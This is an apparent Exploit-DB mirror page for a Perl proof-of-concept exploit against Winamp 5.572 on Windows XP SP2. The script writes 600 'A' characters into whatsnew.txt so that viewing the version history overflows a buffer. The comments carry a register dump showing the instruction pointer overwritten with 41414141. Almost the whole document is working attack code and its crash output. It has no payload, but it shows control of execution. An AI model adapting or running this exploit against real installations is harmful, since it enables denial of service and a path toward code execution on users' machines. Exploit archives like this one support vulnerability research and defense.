exploit-db-mirror/exploits/windows/dos/11248.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
514 B
Perl
Executable file

# Author: Debug (eldadru@gmail.com)
# Version: 5.572
# Tested on: Windows xp(sp2)
#!/usr/bin/perl
# Replace whatsnew.txt , open Winamp click Help->about winamp-> version history.
# hacking.org.il.
#EAX 00000000
#ECX 00000000
#EDX 00661658
#EBX 00000000
#ESP 00B7EDE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBP 00B7EDFC ASCII "AAAAAAAAAAAAAAAAAAA"
#ESI 00401280 winamp.00401280
#EDI 00000000
#EIP 41414141
my $overflow="Winamp 5.572"."A"x600;
open(myfile,'>>whatsnew.txt');
print myfile $overflow;